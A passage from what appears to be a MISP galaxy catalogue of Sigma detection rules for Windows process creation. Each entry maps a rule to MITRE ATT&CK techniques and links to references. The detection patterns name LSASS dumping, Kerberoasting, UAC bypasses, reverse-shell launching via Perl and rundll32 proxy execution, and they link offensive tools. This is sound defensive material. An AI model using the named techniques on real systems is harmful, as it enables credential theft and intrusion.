  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 10126. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Diantz/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml

Use NTFS Short Name in Command Line

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection

The tag is: misp-galaxy:sigma-rules="Use NTFS Short Name in Command Line"

Use NTFS Short Name in Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10127. Table References

Links

https://twitter.com/jonasLyk/status/1555914501802921984

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN

https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ntfs_short_name_use_cli.yml

HackTool - HandleKatz LSASS Dumper Execution

Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same

The tag is: misp-galaxy:sigma-rules="HackTool - HandleKatz LSASS Dumper Execution"

HackTool - HandleKatz LSASS Dumper Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10128. Table References

Links

https://github.com/codewhitesec/HandleKatz

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_handlekatz.yml

Suspicious Encoded PowerShell Command Line

Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)

The tag is: misp-galaxy:sigma-rules="Suspicious Encoded PowerShell Command Line"

Suspicious Encoded PowerShell Command Line has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10129. Table References

Links

https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml

Remote Access Tool - ScreenConnect Remote Command Execution

Detects the execution of a system command via the ScreenConnect RMM service.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Remote Command Execution"

Remote Access Tool - ScreenConnect Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10130. Table References

Links

https://github.com/SigmaHQ/sigma/pull/4467

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml

PUA - Fast Reverse Proxy (FRP) Execution

Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.

The tag is: misp-galaxy:sigma-rules="PUA - Fast Reverse Proxy (FRP) Execution"

PUA - Fast Reverse Proxy (FRP) Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10131. Table References

Links

https://github.com/fatedier/frp

https://asec.ahnlab.com/en/38156/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_frp.yml

Use Of The SFTP.EXE Binary As A LOLBIN

Detects the usage of the "sftp.exe" binary as a LOLBIN by abusing the "-D" flag

The tag is: misp-galaxy:sigma-rules="Use Of The SFTP.EXE Binary As A LOLBIN"

Use Of The SFTP.EXE Binary As A LOLBIN has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10132. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_sftp.yml

UAC Bypass Using IDiagnostic Profile

Detects the "IDiagnosticProfileUAC" UAC bypass technique

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using IDiagnostic Profile"

UAC Bypass Using IDiagnostic Profile has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10133. Table References

Links

https://github.com/Wh04m1001/IDiagnosticProfileUAC

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml

HackTool - RedMimicry Winnti Playbook Execution

Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility

The tag is: misp-galaxy:sigma-rules="HackTool - RedMimicry Winnti Playbook Execution"

HackTool - RedMimicry Winnti Playbook Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10134. Table References

Links

https://redmimicry.com/posts/redmimicry-winnti/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_redmimicry_winnti_playbook.yml

Allow Service Access Using Security Descriptor Tampering Via Sc.EXE

Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.

The tag is: misp-galaxy:sigma-rules="Allow Service Access Using Security Descriptor Tampering Via Sc.EXE"

Allow Service Access Using Security Descriptor Tampering Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 10135. Table References

Links

https://twitter.com/0gtweet/status/1628720819537936386

https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/

https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml

Indirect Command Execution From Script File Via Bash.EXE

Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash

The tag is: misp-galaxy:sigma-rules="Indirect Command Execution From Script File Via Bash.EXE"

Indirect Command Execution From Script File Via Bash.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indirect Command Execution - T1202" with estimative-language:likelihood-probability="almost-certain"

Table 10136. Table References

Links

https://linux.die.net/man/1/bash

Internal Research[Internal Research]

https://lolbas-project.github.io/lolbas/Binaries/Bash/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bash_file_execution.yml

Wscript Shell Run In CommandLine

Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity

The tag is: misp-galaxy:sigma-rules="Wscript Shell Run In CommandLine"

Wscript Shell Run In CommandLine has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10137. Table References

Links

https://web.archive.org/web/20220830122045/http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://blog.talosintelligence.com/modernloader-delivers-multiple-stealers-cryptominers-and-rats/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_inline_vbscript.yml

Conhost.exe CommandLine Path Traversal

detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking

The tag is: misp-galaxy:sigma-rules="Conhost.exe CommandLine Path Traversal"

Conhost.exe CommandLine Path Traversal has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10138. Table References

Links

https://pentestlab.blog/2020/07/06/indirect-command-execution/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_path_traversal.yml

PowerShell Base64 Encoded Invoke Keyword

Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls

The tag is: misp-galaxy:sigma-rules="PowerShell Base64 Encoded Invoke Keyword"

PowerShell Base64 Encoded Invoke Keyword has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 10139. Table References

Links

https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_invoke.yml

Renamed AutoHotkey.EXE Execution

Detects execution of a renamed autohotkey.exe binary based on PE metadata fields

The tag is: misp-galaxy:sigma-rules="Renamed AutoHotkey.EXE Execution"

Table 10140. Table References

Links

https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/

https://www.autohotkey.com/download/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml

Detection of PowerShell Execution via Sqlps.exe

This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.

The tag is: misp-galaxy:sigma-rules="Detection of PowerShell Execution via Sqlps.exe"

Detection of PowerShell Execution via Sqlps.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Trusted Developer Utilities Proxy Execution - T1127" with estimative-language:likelihood-probability="almost-certain"

Table 10141. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/

https://twitter.com/bryon_/status/975835709587075072

https://docs.microsoft.com/en-us/sql/tools/sqlps-utility?view=sql-server-ver15

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml

Use of UltraViewer Remote Access Software

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Use of UltraViewer Remote Access Software"

Use of UltraViewer Remote Access Software has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10142. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_software_ultraviewer.yml

Suspicious Execution From Outlook Temporary Folder

Detects a suspicious program execution in Outlook temp folder

The tag is: misp-galaxy:sigma-rules="Suspicious Execution From Outlook Temporary Folder"

Suspicious Execution From Outlook Temporary Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 10143. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml

Stop Windows Service Via Net.EXE

Detects the stopping of a Windows service via the "net" utility.

The tag is: misp-galaxy:sigma-rules="Stop Windows Service Via Net.EXE"

Stop Windows Service Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10144. Table References

Links

https://ss64.com/nt/net-service.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_stop_service.yml

Renamed Jusched.EXE Execution

Detects the execution of a renamed "jusched.exe" as seen used by the cobalt group

The tag is: misp-galaxy:sigma-rules="Renamed Jusched.EXE Execution"

Renamed Jusched.EXE Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rename System Utilities - T1036.003" with estimative-language:likelihood-probability="almost-certain"

Table 10145. Table References

Links

https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_jusched.yml

PUA - AdvancedRun Execution

Detects the execution of AdvancedRun utility

The tag is: misp-galaxy:sigma-rules="PUA - AdvancedRun Execution"

PUA - AdvancedRun Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 10146. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/

https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3

https://twitter.com/splinter_code/status/1483815103279603714

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml

Uninstall Sysinternals Sysmon

Detects the removal of Sysmon, which could be a potential attempt at defense evasion

The tag is: misp-galaxy:sigma-rules="Uninstall Sysinternals Sysmon"

Uninstall Sysinternals Sysmon has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10147. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml

UAC Bypass Using Windows Media Player - Process

Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Using Windows Media Player - Process"

UAC Bypass Using Windows Media Player - Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10148. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml

HackTool - Rubeus Execution

Detects the execution of the hacktool Rubeus via PE information of command line parameters

The tag is: misp-galaxy:sigma-rules="HackTool - Rubeus Execution"

HackTool - Rubeus Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"

Table 10149. Table References

Links

https://m0chan.github.io/2019/07/31/How-To-Attack-Kerberos-101.html

https://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus

https://github.com/GhostPack/Rubeus

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_rubeus.yml

Gzip Archive Decode Via PowerShell

Detects attempts of decoding encoded Gzip archives via PowerShell.

The tag is: misp-galaxy:sigma-rules="Gzip Archive Decode Via PowerShell"

Gzip Archive Decode Via PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 10150. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_decode_gzip.yml

Group Membership Reconnaissance Via Whoami.EXE

Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.

The tag is: misp-galaxy:sigma-rules="Group Membership Reconnaissance Via Whoami.EXE"

Group Membership Reconnaissance Via Whoami.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"

Table 10151. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_groups_discovery.yml

Suspicious Csi.exe Usage

Csi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'

The tag is: misp-galaxy:sigma-rules="Suspicious Csi.exe Usage"

Suspicious Csi.exe Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10152. Table References

Links

https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Rcsi/

https://twitter.com/Z3Jpa29z/status/1317545798981324801

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Csi/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_csi_execution.yml

Suspicious Git Clone

Detects execution of "git" in order to clone a remote repository that contain suspicious keywords which might be suspicious

The tag is: misp-galaxy:sigma-rules="Suspicious Git Clone"

Suspicious Git Clone has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Code Repositories - T1593.003" with estimative-language:likelihood-probability="almost-certain"

Table 10153. Table References

Links

https://gist.githubusercontent.com/MichaelKoczwara/12faba9c061c12b5814b711166de8c2f/raw/e2068486692897b620c25fde1ea258c8218fe3d3/history.txt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_git_susp_clone.yml

HackTool - SharpImpersonation Execution

Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively

The tag is: misp-galaxy:sigma-rules="HackTool - SharpImpersonation Execution"

HackTool - SharpImpersonation Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003" with estimative-language:likelihood-probability="almost-certain"

Table 10154. Table References

Links

https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

https://github.com/S3cur3Th1sSh1t/SharpImpersonation

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml

Rundll32 InstallScreenSaver Execution

An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver

The tag is: misp-galaxy:sigma-rules="Rundll32 InstallScreenSaver Execution"

Rundll32 InstallScreenSaver Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10155. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl

https://lolbas-project.github.io/lolbas/Libraries/Desk/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_installscreensaver.yml

Service StartupType Change Via Sc.EXE

Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"

The tag is: misp-galaxy:sigma-rules="Service StartupType Change Via Sc.EXE"

Service StartupType Change Via Sc.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10156. Table References

Links

https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_disable_service.yml

Windows Hotfix Updates Reconnaissance Via Wmic.EXE

Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts

The tag is: misp-galaxy:sigma-rules="Windows Hotfix Updates Reconnaissance Via Wmic.EXE"

Windows Hotfix Updates Reconnaissance Via Wmic.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 10157. Table References

Links

https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat

https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_hotfix.yml

Potentially Suspicious WebDAV LNK Execution

Detects possible execution via LNK file accessed on a WebDAV server.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious WebDAV LNK Execution"

Potentially Suspicious WebDAV LNK Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 10158. Table References

Links

https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html

https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webdav_lnk_execution.yml

Potential File Download Via MS-AppInstaller Protocol Handler

Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"

The tag is: misp-galaxy:sigma-rules="Potential File Download Via MS-AppInstaller Protocol Handler"

Potential File Download Via MS-AppInstaller Protocol Handler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10159. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ms_appinstaller_download.yml

Suspicious FromBase64String Usage On Gzip Archive - Process Creation

Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.

The tag is: misp-galaxy:sigma-rules="Suspicious FromBase64String Usage On Gzip Archive - Process Creation"

Suspicious FromBase64String Usage On Gzip Archive - Process Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 10160. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_frombase64string_archive.yml

UAC Bypass Tools Using ComputerDefaults

Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)

The tag is: misp-galaxy:sigma-rules="UAC Bypass Tools Using ComputerDefaults"

UAC Bypass Tools Using ComputerDefaults has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10161. Table References

Links

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml

Password Protected Compressed File Extraction Via 7Zip

Detects usage of 7zip utilities (7z.exe, 7za.exe and 7zr.exe) to extract password protected zip files.

The tag is: misp-galaxy:sigma-rules="Password Protected Compressed File Extraction Via 7Zip"

Password Protected Compressed File Extraction Via 7Zip has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

Table 10162. Table References

Links

https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_7zip_password_extraction.yml

HackTool - Koadic Execution

Detects command line parameters used by Koadic hack tool

The tag is: misp-galaxy:sigma-rules="HackTool - Koadic Execution"

HackTool - Koadic Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"

Table 10163. Table References

Links

https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js

https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/

https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_koadic.yml

Always Install Elevated MSI Spawned Cmd And Powershell

Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell"

The tag is: misp-galaxy:sigma-rules="Always Install Elevated MSI Spawned Cmd And Powershell"

Always Install Elevated MSI Spawned Cmd And Powershell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10164. Table References

Links

https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml

Potentially Over Permissive Permissions Granted Using Dsacls.EXE

Detects usage of Dsacls to grant over permissive permissions

The tag is: misp-galaxy:sigma-rules="Potentially Over Permissive Permissions Granted Using Dsacls.EXE"

Potentially Over Permissive Permissions Granted Using Dsacls.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10165. Table References

Links

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771151(v=ws.11)

https://ss64.com/nt/dsacls.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsacls_abuse_permissions.yml

Shadow Copies Creation Using Operating Systems Utilities

Shadow Copies creation using operating systems utilities, possible credential access

The tag is: misp-galaxy:sigma-rules="Shadow Copies Creation Using Operating Systems Utilities"

Shadow Copies Creation Using Operating Systems Utilities has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10166. Table References

Links

https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml

Perl Inline Command Execution

Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code.

The tag is: misp-galaxy:sigma-rules="Perl Inline Command Execution"

Perl Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10167. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_perl_inline_command_execution.yml

Suspicious Obfuscated PowerShell Code

Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines

The tag is: misp-galaxy:sigma-rules="Suspicious Obfuscated PowerShell Code"

Table 10168. Table References

Links

https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_encoded_obfusc.yml

Remote Access Tool - GoToAssist Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - GoToAssist Execution"

Remote Access Tool - GoToAssist Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10169. Table References

Links

